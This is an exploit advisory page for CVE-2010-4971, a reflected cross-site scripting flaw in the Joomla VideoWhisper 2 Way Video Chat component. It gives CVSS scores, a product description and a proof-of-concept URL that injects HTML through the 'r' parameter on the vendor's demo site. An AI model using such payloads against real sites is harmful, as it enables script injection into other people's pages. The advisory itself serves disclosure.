Joomla VideoWhisper 2 Way Video Chat Cross Site Scripting

2011.11.04
Credit: Sid3^effects aKa HaRi
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2010-4971
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

====================================================== Joomla VideoWhisper 2 Way Video Chat XSS Vulnerability ====================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################## 1 0 I'm Sid3^effects member from Inj3ct0r Team 1 1 ########################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Name :Joomla VideoWhisper 2 Way Video Chat XSS Vulnerability Date : june, 10 2010 Vendor url :http://VideoWhisper.com Tested on : Windows XP SP3 Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com> special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_ greetz to :All ICW members and my friends :) luv y0 guyz ############################################################################################################### Description: VideoWhisper 2 Way Video Chat is a premium high definition video communication software designed for instant 1 on 1 online video conferencing. It's a solution for conducting easy to setup face to face meetings without leaving your office or home. It's the easiest and most cost-effective way to meet somebody and discuss one on one. VideoWhisper 2 Way Video Chat component for Joomla provides an advanced interface for creating and managing 2 way video chat rooms. VideoWhisper 2 Way Video Chat module for Joomla will list public rooms and rooms owned by current logged in user. Rooms can be created, edited, deleted with multiple options, including resolution and framerate, bandwidh, usage limitations like credits that can be assigned for custom durations (daily, monthly). This could be used for setting up paid services (offer 2 way video chat rooms to salesmen, sales companies, call centers). ############################################################################################################### Xploit: XSS Vulnerability DEMO URL http://www.videowhisper.com/demos/2wayvideochat/index.php?r=%22%3E%3E%3Cmarquee%3E%3Ch1%3EXSS3d%20By%20Sid3^effects%3C/h1%3E%3Cmarquee%3E ############################################################################################################### # 0day no more # Sid3^effects

References:

http://xforce.iss.net/xforce/xfdb/59376
http://www.securityfocus.com/bid/40832
http://secunia.com/advisories/40193
http://packetstormsecurity.org/1006-exploits/joomlavideowhisper-xss.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top